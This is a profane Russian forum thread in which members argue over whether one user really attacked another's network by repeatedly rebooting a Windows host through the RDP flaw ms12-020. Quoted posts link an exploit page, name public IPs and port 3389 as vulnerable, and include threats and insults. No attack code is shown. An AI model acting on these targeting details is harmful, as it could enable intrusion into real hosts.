Да он всегда таким был, мне просто интересно, если он такой умный, то что он в своем задрищенске БайКАЛЬске делает. Ему же в МС устраиваться работать надо, главным спешиалистом по бизапаснасти в выньде.

Skynet2015, злой ты

Рехтур хакир-лесоруб

usual_user написал:

Обновления на самбу пришли. Много.

Подтверждаю (для Ubuntu). Тему можно закрывать, ИМХО

Skynet2015 написал:
Даю подсказку - слово из 4-х букв, но не mail

.
А Вы уверены, что не mail?

Павел написал:
А Вы уверены, что не mail?

Инфа - 100%, что не mail!
А что, ты тоже хочешь попробовать меня поломать по IP?

kenzzzooo написал:
злой ты

Да в чем? Я то думал, что он супер-спешялист, а оказалось х.й с байкальской горы.

wr224 написал:
Рехтур хакир-лесоруб

Нет, он просто м#дак.
ЗЫ. RDP у нас вообще не используется.

Павел написал:
А Вы уверены, что не mail?

Скорее всего, сервер называется pop3 - по имени почтового протокола.

Skynet2015 написал:
Еще раз для особо одаренных у нас нет такой машинки и диапазона.

Skynet2015 написал:
Ладно рехтур, скажу я тебе всю правду - спешл фор ю сделали виртуальную мафынку ты ее ломал-ломал, даже не сломал. Успле влезть на нужный порт, да просто тебе сделали так что порты рандомно открываются-закрываются. Как говорится пальцем в жопу - дуракам везет. Потом надоели и закрыли. Удачи с дальнейшими взломами спешиалисть. Повесилил наш ИТ департамент хорошо.

Skynet2015 п№здит?
Да и рандомно открывающиеся/закрывающиеся порты - тоже интересно.... Сервисы случайным образом запускали/останавливали? Или софтину написали, которая на стандартных портах правильные ответы выдавала?

Хотя и доказательств взлома тоже нет.

Светофор был чуть-чуть зеленый.

blow05 написал:
Skynet2015 п№здит?

А в чем пизжу то? То что такой вот машинки у нас отродясь не было? Так это я доказал, то что софтина которая рандомно открывает и закрывает - да есть.

blow05 написал:
Хотя и доказательств взлома тоже нет.

Ну доказательств, что взлома не было я привел. На чем у нас крутится сервак - тоже. То что это была виртуальная сеть - тоже. В чем еще недоверие?

MOP3E написал:
Скорее всего, сервер называется pop3 - по имени почтового протокола.

нееее, тоже мимо.

blow05 написал:
Да и рандомно открывающиеся/закрывающиеся порты - тоже интересно.... Сервисы случайным образом запускали/останавливали? Или софтину написали, которая на стандартных портах правильные ответы выдавала?

Хотя и доказательств взлома тоже нет.

Как нет и доказательств противодействия ему.
Во-первых, машина с указанным адресом работала и после того, как тут всё поутихло, хотя и не пинговалась.
Во-вторых, вот эти самые "рандомные порты". Этого можно добиться. Skynet2015, расскажете поподробнее, как?
В-третьих, есть ощущение, что хост mail.esih.ru существует, и на нем какой-то мейл-сервер под Виндой поднят. То, что изнутри он может называться иначе (smtp, pop3, imap), от этого ощущения не избавляет.
В четвертых, самое главное:

Skynet2015 написал:
Ладно рехтур, скажу я тебе всю правду - спешл фор ю сделали виртуальную мафынку ты ее ломал-ломал, даже не сломал. Успле влезть на нужный порт

То есть, если не удалось узнать про атаку, может, послушаем про ее отражение? Уж админы-то наверняка следили, с каких адресов куда чего шло и т.д. Или они только веселились?

Skynet2015 написал:
А что, ты тоже хочешь попробовать меня поломать по IP?

Нет. Это не мое занятие.
Но лучше бы Вы, уважаемый, умерили свою браваду. Даже не слишком умелые люди бывают злопамятными. Один форум, на котором сидят спокойные (в общей массе) люди, сломал не так давно некий недо-переросток, которого там непочтительно (но по делу) отшили 2 года назад.
Вам - поржать и разойтись, а у другого- такая личная неприязнь, что кушать не может.

Skynet2015 написал:
А в чем пизжу то? То что такой вот машинки у нас отродясь не было? Так это я доказал

Так была машинка или нет? Виртуалка или нет неважно. А то сначала ты говорил, что ip левый, и даже пингануть его не можешь, а потом вдруг оказалось, что была поднята виртуалка

Skynet2015 написал:
софтина которая рандомно открывает и закрывает - да есть.

Это что-то самописное? Или общедоступное? Пошупать дашь?

Skynet2015 написал:
Ну доказательств, что взлома не было я привел.

Тут вопрос доверия. Я ни тебя ни Rector лично не знаю, и не доверяю на слово никому из вас, поэтому факт неоднократной перезагрузки удаленной машины через уязвимый RDP сервер считаю ни доказанным, ни опровергнутым

Павел написал:
Во-первых, машина с указанным адресом работала и после того, как тут всё поутихло, хотя и не пинговалась.

Во первых этой машины никогда и не было. Во вторых кроме ващего "ЯЩЕТАЮ" можете доказать существование этой машины в сети? А?

Павел написал:
Во-вторых, вот эти самые "рандомные порты". Этого можно добиться. Skynet2015, расскажете поподробнее, как?

специальной прогой, а что? нужели такую сложно написать?

Павел написал:
В-третьих, есть ощущение, что хост mail.esih.ru существует, и на нем какой-то мейл-сервер под Виндой поднят. То, что изнутри он может называться иначе (smtp, pop3, imap), от этого ощущения не избавляет.

А кто сказал, что он не существует. Я как раз спаршивал про его название, а название у него оч. специфичное, тот кто ломал бы, точно запомнил.

Павел написал:
То есть, если не удалось узнать про атаку, может, послушаем про ее отражение? Уж админы-то наверняка следили, с каких адресов куда чего шло и т.д. Или они только веселились?

Да я уже х№еву тучу пруфов приводил о том, что кроме 2-3 адресов вообще не пингуется и никогда не существовало в физике, мне что, корпоративные логи приводить? Нене, не получится.

Павел написал:
Но лучше бы Вы, уважаемый, умерили свою браваду.

А не пойти бы вам нах.й уважаемый с вашими же советами, хотя бы по 2 причинам:
1. тут один долбоеб сказал что сломает любую виндовую машину если есму дать белый ИП
2. Этот же долбоеб 2 дня нагло п№здил о том, что ломанул ее без пруфов. Я выкладывал скриншоты того, что он не взломал.
3. Этого же долбоеб№ ловили же на его противоречиях. Еще раз - то что он пытался взломать - было, я не отрицаю - и даже сказал как сниффер+ддос.

Павел написал:
Один форум, на котором сидят спокойные (в общей массе) люди, сломал не так давно некий недо-переросток, которого там непочтительно (но по делу) отшили 2 года назад.
Вам - поржать и разойтись, а у другого- такая личная неприязнь, что кушать не может.

Мне доп№зды до ваших баек из склепа, то что вам и отсосу05 припекло попку, что вашего красноглазика обломали - это чисто ваши анальные расстройства - для начала пусть ваш теушный спец не орал бы, что сломает любую защиту.
ЗЫ И да на этом форуме есть народ, который реально может хакнуть сервак и ему доп№зды под какой осью тот вертится, но они сидят спокойно и ловят лулзы с таких мудофилов как рехтур и иже его защищающих. Ферштейн?

blow05 написал:
Так была машинка или нет? Виртуалка или нет неважно. А то сначала ты говорил, что ip левый, и даже пингануть его не можешь, а потом вдруг оказалось, что была поднята виртуалка

Стоп-стоп-стоп. ГДЕ Я говорил, что IP левый - я всегда говорил что он "белый". Это рехтур орал, что IP фейк. Так что машинка была.

blow05 написал:
Это что-то самописное? Или общедоступное? Пошупать дашь?

Это самописное, пощупать не дам, тк. разработка наших итшников, для отработки внештатных ситуаций в песочнице, которую и подсунуи нашему клоуну.

blow05 написал:
Тут вопрос доверия. Я ни тебя ни Rector лично не знаю, и не доверяю на слово никому из вас, поэтому факт неоднократной перезагрузки удаленной машины через уязвимый RDP сервер считаю ни доказанным, ни опровергнутым

У нас RDP НЕ используется, так что он ну никак не мог использовать уязвимость в том что отключено.

Skynet2015 написал:
Во первых этой машины никогда и не было.

Skynet2015 написал:
Так что машинка была.

Ты уж определись штоле

Skynet2015 написал:
то что вам и отсосу05 припекло попку, что вашего красноглазика обломали - это чисто ваши анальные расстройства

грубовато, не? Кто там кого обломал - мне по МПХ, я не собираюсь доказывать чью-то правоту, я хочу для себя определиться, кто из вас п№здит (или оба?)

blow05 написал:
Ты уж определись штоле

Физически не было. Виртуальная была. Так понятнее шоле?

blow05 написал:
грубовато, не?

Нее

blow05 написал:
я хочу для себя определиться, кто из вас п№здит (или оба?)

В отличие от твоего собрата. я по крайней мере привел n-ое кол-во скриншотов.

Skynet2015 написал:
Во первых этой машины никогда и не было. Во вторых кроме ващего "ЯЩЕТАЮ" можете доказать существование этой машины в сети? А?

Я ничего. Никому. Доказывать не буду.
Но.
После Ваших слов я полностью уверен, что Вы блефуете, как минимум, в некоторых эпизодах. Возможно, во всех.

Skynet2015 написал:
мне что, корпоративные логи приводить?

Нет. Можно было бы пересказать их выборочно, своими словами. Не хотите? Не надо.
"Корпоративные логи"... надо запомнить.

Skynet2015 написал:
А не пойти бы вам

Skynet2015 написал:
Ферштейн?

Я, я.
А чего Вы так нервничаете? Все ж в порядке, ничего не было...

Skynet2015 написал:
Это самописное, пощупать не дам, тк. разработка наших итшников, для отработки внештатных ситуаций в песочнице, которую и подсунуи нашему клоуну.

Не знаю, как долго трудились ваши айтишники, разрабатывая это самописное, но Линукс можно заставить "мигать" портами вполне штатными средствами.
Ладно, ну его, этот взлом. Но мой совет в силе: "не буди лихо, пока оно тихо". Я не знаю лично того, с кем Вы тут бодались. Но в любом случае: сетка, которую Вы подставили - не Ваша личная. И, наверное, не все в ней делаете Вы. Для проверки безопасности существуют другие способы. А так Вы создаете потенциальные проблемы своим пользователям. Следующий новый эксплойт какой-нибудь мудрило, чего доброго, попробует на вас.

Павел написал:
После Ваших слов я полностью уверен, что Вы блефуете, как минимум, в некоторых эпизодах. Возможно, во всех.

Да я блефовал с самого начала. НО в конце сказал ВСЮ правду на самом деле.

Павел написал:
"Корпоративные логи"... надо запомнить.

А что тут не так. ЛОг корпоративного (одного из сервака) или что?

Павел написал:
Я, я.

Головка от часов заря.

Павел написал:
А чего Вы так нервничаете? Все ж в порядке, ничего не было...

Думаете что нервничаю? Вы ошибаетесь. Просто за порцией еды пришел еще раз. Столовая уже 3-ий день подряд работает.

Павел написал:
Не знаю, как долго трудились ваши айтишники, разрабатывая это самописное, но Линукс можно заставить "мигать" портами вполне штатными средствами.

И? Это говорит о том что проги нет? Что вы этим ъотели сказать - что осилили линукс?

Павел написал:
Но в любом случае: сетка, которую Вы подставили - не Ваша личная. И, наверное, не все в ней делаете Вы. Для проверки безопасности существуют другие способы. А так Вы создаете потенциальные проблемы своим пользователям. Следующий новый эксплойт какой-нибудь мудрило, чего доброго, попробует на вас.

Ну как вам сказать, этот ресурс читают примерно 1500 человек в сутки. Есть профи, да. Но только одному долбоеду со смещенным центром тяжести пришло в голову вые....тся и сп.зд.нуть. Просто за свои слова надо отвечать, а он не смог.... Увы и ах.

Skynet2015 написал:
Физически не было. Виртуальная была. Так понятнее шоле?

А какая разница? И зачем тогда скриншоты с пингом?
Кстати скриншот с ОС абсолютно не информативен и ничего не доказывает

blow05 написал:
А какая разница?

Да большая, наш рехтур был уверен, что ломает рабочую машинку, которую аж 20 раз ребутнул.

blow05 написал:
И зачем тогда скриншоты с пингом?

За хлебом. Сколько драмы же было. Весело. Или мне с п.керфесом надо было смотреть на ахинею нашего какира?

blow05 написал:
Кстати скриншот с ОС абсолютно не информативен и ничего не доказывает

Ну так докажи обратное. М?

blow05 написал:
факт неоднократной перезагрузки удаленной машины через уязвимый RDP сервер считаю ни доказанным, ни опровергнутым

Аналогично.

Skynet2015 написал:
отсосу05 припекло попку

Skynet2015 написал:
Головка от часов заря.

Skynet2015, ну чо ты ерепенишься-то? Нормальные же вопросы тебе задали. И ребята это нормальные — Павел и blow05 — без фанатизма и истерик. Зачем ты грубишь им почём зря? Это я тебе могу поверить на слово, поскольку немножко тебя уже знаю. А они-то с каких пирожков тебе должны верить?

Apollo 11 написал:
Skynet2015, ну чо ты ерепенишься-то? Нормальные же вопросы тебе задали. И ребята это нормальные — Павел и blow05 — без фанатизма и истерик. Зачем ты грубишь им почём зря? Это я тебе могу поверить на слово, поскольку немножко тебя уже знаю. А они-то с каких пирожков тебе должны верить?

И ты в ту же степь. Итак, логи ректор не привел, даже доказательств того, что он влез даже в нашу виртуалку нет. Я ему специально задавал наводящие вопросы - он юлил и отнекивался. Потом тактично слился, хотя вчера с пеной у рта доказывал, что он суперкакир. Машинка которую он якабы сломал вообще не пингуется, хотя белый IP внезапно есть. Когда я ректора спросил какие еще машины в сети имеют белый ИП он так же технично слился сказал что сеть 194.190.10.XX не пингуется вообще. Ему опять показали что он как бэ п№здит. Что мне еще сделать - ни логи, ни топологию я по соображениям безопасности показать не могу.

Skynet2015 написал:
И ты в ту же степь. Итак, логи ректор не привел, даже доказательств того, что он влез даже в нашу виртуалку нет. Я ему специально задавал наводящие вопросы - он юлил и отнекивался. Потом тактично слился, хотя вчера с пеной у рта доказывал, что он суперкакир. Машинка которую он якабы сломал вообще не пингуется, хотя белый IP внезапно есть. Когда я ректора спросил какие еще машины в сети имеют белый ИП он так же технично слился сказал что сеть 194.190.10.XX не пингуется вообще. Ему опять показали что он как бэ п№здит. Что мне еще сделать - ни логи, ни топологию я по соображениям безопасности показать не могу.

Ты неправ. Я тебе сказал, что я тебе могу поверить на слово. Но они-то с какого перепугу должны верить? Пока что, действительно, убедительных аргументов (т.е. способных убедить непредвзятого наблюдателя) приведено не было. То, что лично я тебе верю, ничего не меняет в сути дела. Я вообще считаю, что факт взлома должен доказывать тот, кто взломал. Но пока что убедительных аргументов не было приведено ни одной стороной.

Skynet2015 написал:
Ну так докажи обратное. М?

Я утратил веру в твою адекватность.

То ты рассказываешь, что машины по ip вообще не существует, приводя скриншоты с пингом, потом оказывается, что там всё-таки была виртуалка (в чем разница то, а?), потом какой-то левый скриншот (после того, как виртуалку уже потушили) без ip, где написано, что ОС - Linux, а потом еще я что-то должен доказывать?

Я не буду оспаривать, что ректор ничего не взломал. Тем более - там если и были - то только ребуты, и тут можно долго и нужно с пеной у рта материть оппонента, но ни одного реального аргумента (который сможет убедить незаинтересованного свидетеля) ни одна сторона не сможет. Но и твое поведение не позволяет доверять тебе на слово.

А то что ты, несмотря на обещания выдать белый ip реальной машины, подсунул ip виртуалки из левой конторы говорит только о том, что в безопасности своей любимой ОС ты, несмотря на все бравады и оскорбления, не уверен. Сразу скажу - я никогда не говорил о супербезопасности какой-либо ОС, поэтому требовать у меня какие-то ip бессмыссленно

Apollo 11 написал:
Пока что, действительно, убедительных аргументов (т.е. способных убедить непредвзятого наблюдателя) приведено не было.

Какие аргументы мне надо привести? А? особенно после того как:

Apollo 11 написал:
Я вообще считаю, что факт взлома должен доказывать тот, кто взломал.

А я ему помогал, реально и сейчас готов буду признать факт взлома, а не сниффа с тупым ддосом пока он не скажет:
1. Название DNS-суффикса
2. Название почтового сервера
Ну это реально самое простое, но можно узнать если внедрится в эту сетку.

blow05 написал:
То ты рассказываешь, что машины по ip вообще не существует

не существует, можешь узнать по любому whois сервису. Еще раз физической машины с белым IP выполняющую роль, как сказал ректор с IP телефонией, TS, DMW нет. Была создана саавсем другая машина с саавсем другим набором програм.

blow05 написал:
чем разница то, а?

Аппаратное оборудование есть на одной, а другая запущена с помощью нетвари - есть различия или как?

blow05 написал:
А то что ты, несмотря на обещания выдать белый ip реальной машины

Белый реальный IP конторы я выдал, той конторы в которой я работаю:

Еще доказательства?

Ушли от темы и выловили несостоявшегося хакера.Что дальше?А по теме не чего

Skynet2015 написал:
Аппаратное оборудование есть на одной, а другая запущена с помощью нетвари - есть различия или как?

Да какая нахр№н разница - виртуалка или нет? Есть ОС, ее сетевому интерфейсу соответствует ip, на ней установлены какие-то службы, открыты порты... В чем здесь разница между аппаратной и виртуальной конфигурацией? В рамках обсуждаемой темы. А ты пытался всех убедить, что ничего по этому ip отвечать не может, приводя скриншот пинга (кстати на будущее - это нифига не аргумент). Тем самым ты пытался ввести нас (сторонних незаинтересованных наблюдателей) в заблуждения, т.к. виртуалка по этому ip все-таки была. Вот и как после этого верить тебе на слово?

blow05 написал:
Да какая нахр№н разница - виртуалка или нет? Есть ОС, ее сетевому интерфейсу соответствует ip, на ней установлены какие-то службы, открыты порты... В чем здесь разница между аппаратной и виртуальной конфигурацией? В рамках обсуждаемой темы. А ты пытался всех убедить, что ничего по этому ip отвечать не может, приводя скриншот пинга (кстати на будущее - это нифига не аргумент). Тем самым ты пытался ввести нас (сторонних незаинтересованных наблюдателей) в заблуждения, т.к. виртуалка по этому ip все-таки была. Вот и как после этого верить тебе на слово?

Да в том, что эта конфигурация была СПЕЦИАЛЬНО сделана для этого случая. Еще раз для реально особо одаренных - ректор сказал что он перезагрузил РАБОЧУУЮ машину 20 раз. То что такого рабочего сервера не было никогда и не будет, особенно на 7-ой винде - факт. И еще раз - ректор об этом прекрасно знает. И да, тыц где-то 2 поста назад говорил мне, что я вообще дал IP левой конторы. М? Ты давай не умничай - скажи какие тебе нужны доказательства. А?

Skynet2015 написал:
Да в том, что эта конфигурация была СПЕЦИАЛЬНО сделана для этого случая. Еще раз для реально особо одаренных - ректор сказал что он перезагрузил РАБОЧУУЮ машину 20 раз.

Ну так а зачем было утверждать, что по этому ip ничего нет и быть не может? Машина (пусть и виртуальная) - была? да. Работала? да. Рабочая машина? да Перезагрузил или нет? не знаю. Как что-то доказать? не знаю. Поэтому и говорю о недоказанности (и о невозможности доказать) позицию кого-либо из вас. Но повторюсь еще раз - твое поведение не добавляет тебе доверия.

Skynet2015 написал:
это контора наших партнеров. А компов с диапазоном 194.190....... там вообще отродясь не было.

Skynet2015 написал:
И да, тыц где-то 2 поста назад говорил мне, что я вообще дал IP левой конторы. М?

А теперь ты вдруг там работаешь. Да, и попытка пингануть 194.190.10.0 доставила

blow05 написал:
Ну так а зачем было утверждать, что по этому ip ничего нет и быть не может?

ну а ты проверь, проверь. Проверь даже через 10 дней. Там нет ниченго и быть не может. Резервный ИП.

blow05 написал:
Рабочая машина?

неа, кто на нй работал то?

blow05 написал:
А теперь ты вдруг там работаешь.

А я не отрницал что я блефую и?

blow05 написал:
Да, и попытка пингануть 194.190.10.0 доставила

Ну так меня весь взлом по IP доставил. А ты пытаешься еще что-то доказать.

Skynet2015 написал:
Там нет ниченго и быть не может.

А виртуалка была?

Skynet2015 написал:
неа, кто на нй работал то?

а как это по ip определить, подскажешь?

Skynet2015 написал:
А я не отрницал что я блефую и?

Так вот твой блеф и породил мое недоверие к тебе

Skynet2015 написал:
А ты пытаешься еще что-то доказать.

А я ничего и не доказываю. Я обосновываю причину недоверия твоим словам

blow05 написал:
А виртуалка была?

Ну так чем отличает рабочая машина с белым IP и виртуалка, которой выделили белый IP по приколу?

blow05 написал:
а как это по ip определить, подскажешь?

Ну окромя IP можно же посмотреть с кем она трафом обменивается, не? Особенно когда сервер, имеющий белый IP должен по любому иметь нех№евую такую нагрузку, особенно если там IP телефония подключена, не? И терминальный сервер, не? А сейчас вообще не пингуется, хотя должна.

blow05 написал:
А я ничего и не доказываю.

Да лана?

blow05 написал:
Skynet2015 п№здит?

Особенно после того как ты показал цитаты.

Skynet2015 написал:
Да лана?

так виртуалку перезагружал или нет?

Skynet2015 написал:
Ну так чем отличает рабочая машина с белым IP и виртуалка, которой выделили белый IP по приколу?

ну так объясни, чем (в рамках обсуждения данной темы)

Skynet2015 написал:
Ну окромя IP можно же посмотреть с кем она трафом обменивается, не?

Интересно, как ты удаленно это сделаешь (т.е. не попав на сам хост и не запустив сниффер на другом хосте внутри сети)

Skynet2015 написал:
А сейчас вообще не пингуется, хотя должна.

Вижу, у тебя достаточно общие знания о работе сетей.

Skynet2015 написал:
Да лана?

Угумс. Я высказал предположение и обосновываю его. Хотя здесь это конечно не принято, здесь принято оскорбл.ть оппонента, если он с чем-то посмел несогласиться

Skynet2015 написал:
Какие аргументы мне надо привести? А?

Да хр№н его знает. Я вообще не могу себе представить, как можно доказать, что машина не была взломана. Нет, конечно, логи там проанализировать, в особо параноидальных случаях — md5 (примерно так действует rkhunter и т.д. Но это же, один хр№н, не даст 100%-ной гарантии. Логи можно подчистить, а сверка сумм в данном случае вообще ничего не даст. Всегда проще доказать, что что-то было взломано, чем доказывать, что взлома не было. Я бы, на твоём месте, вообще сказал: "Ты взломал, — ты и доказывай". Но ты же взялся что-то доказывать и... высказал противоречащие друг другу утверждения. Отсюда — недоверие к твоим словам со стороны Павла и blow05.

Apollo 11, так дело в том, что и взлома как такового не было - ректор утверждал про многократный ребут. Здесь вообще доверие - только на слово (ну можно логи продемонстрировать, в которых все чисто - только что это даст? При отсутствии доверия то)

blow05 написал:
Apollo 11, так дело в том, что и взлома как такового не было - ректор утверждал про многократный ребут. Здесь вообще доверие - только на слово (ну можно логи продемонстрировать, в которых все чисто - только что это даст? При отсутствии доверия то)

Да, я понял суть Ваших с Павлом вопросов. Если взлома не было, то тут, действительно, вообще ничего доказать невозможно. Конкретно Rector с самого начала утверждал потенциальную возможность взлома из-за "дырявого" RDP. Короче, я тоже не могу занять чью-либо сторону. Skynet'у я, в принципе, мог бы поверить на слово, поскольку хорошо к нему отношусь. Но и к Rector'у у меня отношение лояльное и причин не доверять ему я пока что не вижу. Так что брейк и паритет. ИМХО, естественно :)

blow05 написал:
Apollo 11, так дело в том, что и взлома как такового не было - ректор утверждал про многократный ребут. Здесь вообще доверие - только на слово (ну можно логи продемонстрировать, в которых все чисто - только что это даст? При отсутствии доверия то)

Вы же нормальный человек. Если хотите разобратся то начните с начала
Это же полный маразм со стороны Rector и речь была конкретно о взломе и нечего ему было попой вилять. А со стороны Skynet2015 частичный блеф (причем начало положил Rector) оправдан введением противника в заблуждение, особенно если он сам путался (в показаниях)
Вот начало

Цитата:
Rector написал:
Угу, только виндузятники так скромно молчат о найденной серьёзной уязвимости ms12-020. Сплойт тут http://www.securitylab.ru/poc/extra/421792.php. Вот это я пониманию, уязвимость -) А что до самбы, так она в сетях нужна только виндовым клиентам, т.к. win -машины без костылей другие протоколы не поддерживают (например sshfs). Короче, виндовые админы, кроме как "расшарить" и не умеют больше нифига, в основной своей массе -) За что их и имели в задницу через ms08-67 =)))

Теоретически да, закрыта. А практически, порядка 30-40% серверов, в Интернете по крайней мере, уязвимы до сих пор.

Это можете легко проверить например в сети своего провайдера.

Это вообще маловероятно. Опасность может исходить только в локалках от "умных" сотрудников.
--
Среди виндузятников так это сплошь и рядом. Ибо мало кто из них знает что делают эти волжебные крыжики на интерфейсах их серверов.
Вот например - в маленьком диапазоне 80.237.47.128-255 находятся два сервера. Один из них уязвим (50%). Вот так -)
Кстати, насчет NFS...Нередко встречаю в Сети открытый наружу. Хотя...это проблемы тех админов что голую задницу свою в открытое окно выставили ;-)
MOP3E, Ты заеб№л. Что там у тебя ломать? Твою домашнюю машину, которая сидит за линукс-роутером. Или ты напрямую поднимаешь соединение? В любом случае твоя машинка глухо прикрыта фаерволом и никакие демоны наружу не работают. Верно?
--
Так что там ломать? -))
Вот и расскажи, что ты там ломаешь последние три года? Или признай, что слился, тогда я тебе об этом фэйле напоминать перестану.
Skynet2015
Взломай лучше меня, реально белый адрес и реально мое МП на этом глобусе:пост №45
В чем же, если не секрет?
ikkunan salvataja, Именно винда, седня выходной у меня, так что белый ип и никакой циски.
Rector, Ну ломай меня, ломай меня полностью!
Может твоему начальнику позвонить? И доложить какой ты на самом деле?
Skynet2015, заткнись там лучше. Не зли меня...Если я начну работать против тебя, тебе Иркутск раем покажется. Ты меня понял?
Ломай меня полностью на дуЕли, ломай! Адрес в Торонто дать, где я живу? А мб реальную страницу на фейсбуке?
RECTOR
Самый прикол в том что начнёшь его шерстить, так только виндовые машинки и светят дырявыми сервисами -)) Вот например в сетушке Skynet'а, сидит некая машинка виндовая-серверок ;-) И что там только на ней нет -)) даже телефония поднята и DameWare и Microsoft Terminal Service. Рули не хочу -)) Особенно прикольно что RDP на ней дырявый -))
Ну а по поводу машинки дырявой по RDP, еще 4 часа назад она ложилась и ноги раздвигала....
Skynet2015, IP машинки в студию выложить?
---
Не ну б..дь ты и долб..б! Сетушку засветил, фейковал тут чё то...Надо по ходу тебя твоим безопасникам сдать...
--
Так IP машинки выложить?
++
Учти, тут с 1000 челов сейчас это читают. Пи...ц сетушке может настать. И виноват будешь ты -))
Так что...тут приводить доказательства что машина в сети 194.190.10.0/24 валится от одного чиха, я не буду. Единственное что могу сказать - что порт 3389 на этой машине 194.190.10.214 уязвим в данный момент.
От меня нет. Просто машинка эта 194.190.10.214 сегодня ноги раздвинула раз 20 =)) Кто там у тебя на ней работает? Может ты сам? И как тебе ребуты? Понравились? -)
===
Ещё раз, пря счас? =))
TrollWINNT написал:
Skynet2015 давал адрес 194.190.10.251 с какого буя выполз 194.190.10.214 просветите плз?

Rector
251 - это их корневой маршрутизатор (и вероятно шлюз в другие сети), 214 - это машинка под 7 виндой (prof). На ней были открыты нетбиоспорты, терминал...ну другая х.йня. После всего кипиша, Кай видимо позвонил тем самонадеянным и надутым индюкам, по названием "Одмины" и они там всю прикрыли. Да, теперь хост 194.190.10.214 даже не пингуется -)
Ну как тебе сказать Кай...Сейчас ты тут будешь себе попку мазать с HoneyPot' а, что-бы не болело -)) Это ты потом будешь, в следующий раз перед начальством объяснятся почему фин.директору комп сломали. Заодно будешь про медок отмазки лепить.
==
Не, ну я вообще в ах№е! И этот чмо работает в ИСБ?
Застрелись Кай -))

говорились вполне конкретные вещи. Если к этому добавить выступления этого автора за прошлые сезоны , то можно сделать очевидные выводы.

blow05 написал:
ну так объясни, чем (в рамках обсуждения данной темы)

по данной теме рабочие машинки как работали так и работают, а эта просто делала вид что работает. Как то так.

blow05 написал:
Интересно, как ты удаленно это сделаешь (т.е. не попав на сам хост и не запустив сниффер на другом хосте внутри сети)

ну так ректор же как то сделал, не?

blow05 написал:

Угумс. Я высказал предположение и обосновываю его. Хотя здесь это конечно не принято, здесь принято оскорбл.ть оппонента, если он с чем-то посмел несогласиться

та нее, ты меня назвал п.здоболом, не?

usual_user написал:
так виртуалку перезагружал или нет?

отключил

blow05 написал:
Вижу, у тебя достаточно общие знания о работе сетей.

х№евое у тебя зрение, еще раз, если бы на этой машине работали ип телефония, как сказал рехтур - то ее бы по любому можно было бы пингануть, не?

UPS написал:
говорились вполне конкретные вещи.

Да уж... Действительно, вполне конкретные вещи:

Skynet2015 написал:
седня выходной у меня, так что белый ип и никакой циски.

Skynet2015 написал:
Я ему дал корпоративный ИП компании-партнера нашего, так что п№здит он тебе нагло

Skynet2015 написал:
А компов с диапазоном 194.190....... там вообще отродясь не было.

Skynet2015 написал:
у меня нет сети с таким диапазоном

Skynet2015 написал:
спешл фор ю сделали виртуальную мафынку ты ее ломал-ломал, даже не сломал. Успле влезть на нужный порт, да просто тебе сделали так что порты рандомно открываются-закрываются

Skynet2015 написал:
Повесилил наш ИТ департамент хорошо.

Skynet2015 написал:
Нене, она пингуется:

Skynet2015 написал:
Машинка которую он якабы сломал вообще не пингуется

Skynet2015 написал:
на чем РЕАЛЬНО крутилась виртуалка Linux

Skynet2015 написал:
Во первых этой машины никогда и не было.

Skynet2015 написал:
Так что машинка была.

Skynet2015 написал:
Да я блефовал с самого начала. НО в конце сказал ВСЮ правду на самом деле.

Ну, и кому верить?

Apollo 11 написал:
Ну, и кому верить?

Мне вот интересно только другое, что ты такие же цитаты ректора не привел? А?

Skynet2015 написал:
Мне вот интересно только другое, что ты такие же цитаты ректора не привел? А?

Потому что их привёл UPS. Пойми, наконец, ни Павел, ни blow05, ни, тем более, я не утверждали, что Rector реально что-то там сломал. Речь шла о том, что статус ваших аргументов с обеих сторон — одинаково бездоказательный и противоречивый. Поэтому и занимать чью-то сторону в данном споре бессмысленно. Это вендошпана, вроде МОРЗЕ готова визжать от восторга, лишь бы наблюдать слив Rector'а, и готова признать любой бред ради этого. А, если же разобраться, то вообще хр№н поймёшь, кто из вас прав.

Skynet2015 написал:
работали ип телефония, как сказал рехтур - то ее бы по любому можно было бы пингануть, не?

То есть если на машине какой сервис крутится то она по любому пингуется?
Ну тогда пингуем 188.134.14.111 , а потом забираем с ftp://188.134.14.111/pub/slor.png файл.

Apollo 11, Ну давай разберемся теперь:
1. Ректор уже 2 года бравировал тем что сломает любой комп под виндой
2.Позавчера я ему дал наживку, этот же д.бил вообще не пробил по whois (признак спеца налицо), пригрозив мне карами, что у него есть некое досье на меня
3. Вроде бы успокоились, но данный чел решил повыебываться перед белым рысем, сказав, что сломал мою сеть
4. Ему попросили привести доказательства, но вместо этого он начал говорить о мифической машинке с определенным набором сервисов
5. Решив поддержать этот долбоебизм я начал подыгрывать (ибо виртуальная машина была такая, ей был выдан реальный белый ИП, но с совершенно с другим набором ПО и под виндой). Пример:

6. Он не унимался и говорил, что он ломанул меня по RDP, хотя у нас оно вообще не используется.
Ну и пошло-поехало. Что еще?

UPS, А я и не защищаю ректора. Но в постах скайнета мне встретились противоречия, которые аполло выше процитировал. В словах ректора таких явных противоречий не было. Да, он привел конкретные вещи, но не подтвердил их. Хотя как он мог подтвердить их - я не знаю (завести у себя в локалке виртуалку с правильным ip и произвести над ней какие-то действия - не сложно, и таким логам лично я бы не поверил). Поэтому я и говорю, что факт перезагрузки не доказан и не опровергнут.

Skynet2015 написал:
по данной теме рабочие машинки как работали так и работают, а эта просто делала вид что работает. Как то так.

Не уверен, что смогу это корректно прокомментировать

Skynet2015 написал:
ну так ректор же как то сделал, не?

Определить сервисы, работающие на системе и открытые наружу - несложно. Удаленно определить, насколько они загружены - я не знаю, как это можно сделать

Skynet2015 написал:
та нее, ты меня назвал п.здоболом, не?

А ты меня отсосом. 1:1 (хотя я конечно задал вопрос, а не п№здит ли скайнет, причем обосновав свое мнение, но ладно)

Skynet2015 написал:
х№евое у тебя зрение, еще раз, если бы на этой машине работали ип телефония, как сказал рехтур - то ее бы по любому можно было бы пингануть, не?

нет, зрение у меня как раз отличное, а ты только что снова продемонстрировал отсутствие базовых знаний в данной предметной области

Apollo 11 написал:
Так что брейк и паритет.

+1.
Вот так, незаметно, скоротали время в ожидании заплатки для Самбы.
Пора вернуться к вечным вопросам, экзистенциальным, не побоюсь этого слова.

Skynet2015 написал:
1. Ректор уже 2 года бравировал тем что сломает любой комп под виндой

Да ладно! Сказал человек по пьяне или в азарте с№ча, так что теперь? Сколько можно ему это вспоминать? Кто из нас тут не говорил глупости в азарте с№ча?

Skynet2015 написал:
2.Позавчера я ему дал наживку, этот же д.бил вообще не пробил по whois (признак спеца налицо), пригрозив мне карами, что у него есть некое досье на меня

Так IP 194.190.10.214 был или нет?

Skynet2015 написал:
3. Вроде бы успокоились, но данный чел решил повыебываться перед белым рысем, сказав, что сломал мою сеть

